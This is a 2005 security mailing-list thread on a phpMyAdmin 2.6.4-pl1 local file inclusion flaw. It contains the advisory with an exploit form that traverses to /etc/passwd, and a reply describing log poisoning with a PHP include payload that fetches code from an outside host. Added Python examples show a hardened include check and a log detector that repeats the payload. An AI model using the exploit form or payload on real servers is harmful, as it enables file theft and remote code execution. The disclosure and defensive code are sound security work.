[SECURITYREASON.COM] phpMyAdmin Local file inclusion 2.6.4-pl1



max@jestsuper.pl
12/10/05, 02:45
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin Local file inclusion 2.6.4-pl1]

Author: Maksymilian Arciemowicz ( cXIb8O3 )
Date: 10.10.2005
from SECURITYREASON.COM

- --- 0.Description ---
phpMyAdmin 2.6.4 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
blablabla...
phpMyAdmin is a very dangerous script.

- --- 1. Local file inclusion (Critical) ---
File: ./libraries/grab_globals.lib.php

This file is included by many files. Example file index.php

- -index.php--
<?php
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
* Gets core libraries and defines some variables
*/
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
....
- -index.php--

ok so. In ./libraries/grab_globals.lib.php we have:

- -101-104-grab_globals.lib.php---------
if ( ! empty( $__redirect ) ) {
require('./' . $__redirect);
exit();
} // end if ( ! empty( $__redirect ) )
- -101-104-grab_globals.lib.php---------

But before we have

- -53-67-grab_globals.lib.php-----------
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
// if a subform is present and should be used
// the rest of the form is deprecated
$subform_id = key( $_POST['usesubform'] );
$subform = $_POST['subform'][$subform_id];
$_POST = $subform;
if ( isset( $_POST['redirect'] )
&& $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
$__redirect = $_POST['redirect'];
unset( $_POST['redirect'] );
} // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
- -53-67-grab_globals.lib.php-----------

If the variable $_POST['usesubform'] exists and is an array, then we can create new variables for $_POST (example $_POST['redirect']).

$subform = $_POST['subform'][$subform_id];
$_POST = $subform;

where array $_POST = array $_POST[subform][1], so that
$_POST['redirect'] = $_POST[subform][1][redirect]

and we have local file inclusion.

Example response in html:

- -Exploit---
<CENTER>
<A HREF="http://www.securityreason.com"><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>
<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>
- -Exploit---

Exploit:
http://securityreason.com/achievement_exploitalert/2

- --- 2. Greets ---

sp3x

- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
WWW: http://securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T
cvqCRiRlK9XrQGvV3sYxzXQ=
=yoDY
-----END PGP SIGNATURE-----
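The kind of check a fix for this `$__redirect` handling needs, as an added example that is not part of the advisory or of phpMyAdmin's own code, written in Python rather than PHP so the logic can be run on its own: `original_check` mirrors the only test the quoted grab_globals.lib.php lines apply (non-empty and not the current script's basename), `hardened_check` canonicalises the joined path, confirms it still lies under the web root, and only then requires an allowlisted script name. The allowlist, the temporary directory tree and the sample values (including the advisory's `../../../../../../../etc/passwd`) are constructed for the demonstration.

```python
import os
import shutil
import tempfile

# Constructed allowlist of scripts a subform may hand over to; a real fix
# would derive it from the phpMyAdmin scripts that actually accept subforms.
ALLOWED_TARGETS = frozenset({"index.php", "db_details.php", "tbl_properties.php"})


def original_check(redirect, current_script="index.php"):
    """Mirror of the only test grab_globals.lib.php makes before
    require('./' . $__redirect): non-empty and not the current script.
    The './' prefix does nothing against '../' components."""
    return bool(redirect) and redirect != os.path.basename(current_script)


def resolve_inside_webroot(redirect, webroot):
    """Canonicalise webroot + redirect ('..' and symlinks resolved) and return
    the result only if it is still under the web root, else None."""
    if not redirect or "\0" in redirect or os.path.isabs(redirect):
        return None
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, redirect))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


def hardened_check(redirect, webroot, current_script="index.php"):
    """Containment check plus allowlist: the canonical target must be a regular
    file directly under the web root whose name is allowlisted and differs
    from the current script.  Returns the path to include, or None."""
    target = resolve_inside_webroot(redirect, webroot)
    if target is None:
        return None
    name = os.path.relpath(target, os.path.realpath(webroot))
    if name not in ALLOWED_TARGETS or name == os.path.basename(current_script):
        return None
    return target if os.path.isfile(target) else None


def build_sample_tree():
    """Constructed throwaway tree: <tmp>/www is the web root with two scripts
    and a symlink escaping it; <tmp>/etc/passwd sits outside the root."""
    base = tempfile.mkdtemp(prefix="pma-demo-")
    www = os.path.join(base, "www")
    os.makedirs(www)
    os.makedirs(os.path.join(base, "etc"))
    for name in ("index.php", "db_details.php"):
        with open(os.path.join(www, name), "w") as fh:
            fh.write("<?php /* placeholder script */ ?>\n")
    with open(os.path.join(base, "etc", "passwd"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed content
    try:
        os.symlink(os.path.join(base, "etc", "passwd"), os.path.join(www, "leak"))
    except OSError:
        pass  # no symlink support here; that case then just fails the allowlist
    return www


# Constructed inputs; the long traversal is the value from the advisory's form.
SAMPLE_INPUTS = [
    "db_details.php",                   # legitimate subform target
    "index.php",                        # same script: both checks refuse it
    "../etc/passwd",                    # one level out of the web root
    "../../../../../../../etc/passwd",  # the advisory's value
    "leak",                             # symlink pointing outside the root
    "db_details.php\0.txt",             # NUL byte: would truncate a C-level open
]


def run_demo():
    """Evaluate both checks on every sample; maps input -> (original, hardened),
    where True means the value would be passed on to require()."""
    webroot = build_sample_tree()
    try:
        return {
            value.replace("\0", "\\0"): (
                original_check(value),
                hardened_check(value, webroot) is not None,
            )
            for value in SAMPLE_INPUTS
        }
    finally:
        shutil.rmtree(os.path.dirname(webroot), ignore_errors=True)


if __name__ == "__main__":
    for value, (orig, hard) in run_demo().items():
        print(f"{value:40} original={orig!s:5} hardened={hard}")
```

The containment step is kept separate from the allowlist on purpose: a string comparison against the unresolved path (`startswith(webroot)`) would still pass the `leak` symlink, which is why the check canonicalises first and only then looks at the name.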

Andreas Zeidler
12/10/05, 22:25
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Mon, Oct 10 16:11, Maksymilian Arciemowicz <max@jestsuper.pl> wrote:
> - --- 0.Description ---
> phpMyAdmin 2.6.4 is a tool written in PHP intended to
> handle the administration of MySQL over the Web.
> [...]
> phpMyAdmin is very dangerous script.
>
> - --- 1. Local file inclusion (Critical) ---
> File: ./libraries/grab_globals.lib.php

hi again,

since my post yesterday apparently had some trouble being delivered
because of a "suspicious attachment" (my pgp sig :)) i thought i'd
send it again. and this time even as a reply to the right message... :)

in case you already got this, sorry for bothering twice,


andi

- ----- quote on ---------------------------------------------------------
this is a comment on the recent phpmyadmin vulnerability[1] discovered
by maksymilian arciemowicz. i didn't really know where to post this,
so i hope this is the right place.

anyway, since i've used a file inclusion vulnerability in an older
version of phpmyadmin as a starting point for a security analysis last
weekend, and came up with a rather simple idea of how to use it for
unprivileged script execution of remote php code, i thought i'd post
this here. actually i think this method could be used on any php-based
local include vuln, so i was wondering why i couldn't yet find anything
about it on the net...

okay, the problem with local file vulns is of course, that the contents
of the file being read are not evaluated. but given php's include
statement they are -- if they contain a valid php statement. now instead
of trying to upload a file containing php code (which wasn't possible in
my case), i asked myself if there was a way to use the server to create it
for me?

the idea that hit me before falling asleep was to send the code i needed
(like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the user
agent string, this way having the web server write it into a file for
me, and in a second step simply use the already existent local file vuln
to read the server's log file and this way execute the code.

of course this method doesn't always work. php mustn't run in safe
mode, the web server has to log user agent strings and the log files
must be accessible after privileges have been dropped. since most
people are logging in combined format, i guess the last requirement is
the most critical one, but many logs are world-readable nevertheless.
also, enabled url-based includes make things easier, but they're not
strictly necessary.

so, provided with a php local file vuln and readable log files,
executing arbitrary commands comes down to locating a suitable log file
to include. with a little guessing and the ability to read files (i.e.
the server configuration) this is not too difficult.

that's it. any comments and feedback about this is most welcome,
especially since this approach seems much too simple to not have been
used before. maybe someone can just point me to an already existing
discussion about this... :)

[1] http://www.securityfocus.com/bid/15053
- ----- quote off --------------------------------------------------------

- --
zeidler it consulting - http://zitc.de/ - info@zitc.de
karl-kunger-str 59 - 12435 berlin - phone +49 30 25563779
no software patents in europe! - http://noepatents.eu.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDTWK5V41LSDEbSrkRArkyAKCMW/Wg9XZ5BErRujvN5sjhXVeTfgCgl/Sx
CUrBPEZ35UWqjxofn9Pj9hQ=
=qJYs
-----END PGP SIGNATURE-----
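Detection logic for the two things this thread describes, as an added example that is not part of either post: it parses Apache combined-format access-log lines (the format the reply says most people log in) and flags PHP code placed in the User-Agent or Referer field as well as directory traversal in the request line, decoding twice so percent-encoded variants are caught. The log lines, IP addresses and hostnames are constructed; the first User-Agent is the shape of payload the post above describes.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: the two quoted fields at the end are Referer and
# User-Agent; Apache escapes embedded quotes as \" so the groups allow that.
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# PHP open tags or include/require calls inside a client-supplied header are
# the signature of a log-poisoning attempt; '../' in the request is traversal.
_PHP_CODE = re.compile(r"<\?(?:php\b|=)|\b(?:include|require)(?:_once)?\s*\(", re.I)
_TRAVERSAL = re.compile(r"\.\.[/\\]")


def parse_combined(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = _COMBINED.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def inspect_line(line):
    """Return (ip, field, reason) findings for one line; malformed lines are
    reported rather than silently dropped so log tampering is not missed."""
    rec = parse_combined(line)
    if rec is None:
        return [("?", "line", "unparseable")]
    findings = []
    for field in ("ua", "referer"):
        if _PHP_CODE.search(rec[field]):
            findings.append((rec["ip"], field, "php code in client header"))
    # Decode twice so %2e%2e%2f and the double-encoded %252e variants both show.
    if _TRAVERSAL.search(unquote(unquote(rec["request"]))):
        findings.append((rec["ip"], "request", "directory traversal"))
    return findings


def scan(lines):
    """Run inspect_line over an iterable of lines and collect all findings."""
    return [hit for line in lines for hit in inspect_line(line)]


# Constructed sample log; IPs are from the documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2005:16:11:02 +0200] "GET /phpMyAdmin/index.php HTTP/1.1" 200 5120 "-" "<?php include('http://203.0.113.9/script.php'); ?>"
198.51.100.4 - - [10/Oct/2005:16:12:40 +0200] "GET /phpMyAdmin/index.php?redirect=../../../../../../../etc/passwd HTTP/1.1" 200 1803 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2005:16:12:41 +0200] "GET /phpMyAdmin/index.php?redirect=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1803 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Oct/2005:16:13:05 +0200] "GET /phpMyAdmin/db_details.php?db=test HTTP/1.1" 200 9214 "http://intranet.example/phpMyAdmin/index.php" "Mozilla/5.0 (X11; Linux i686)"
this is not an access-log line
""".splitlines()


if __name__ == "__main__":
    for ip, field, reason in scan(SAMPLE_LOG):
        print(f"{ip:14} {field:8} {reason}")
```

Because the reply's technique works through whatever the server writes into a world-readable log, the same header inspection is worth applying to error logs and to any other file the web server writes from request data, not only the access log.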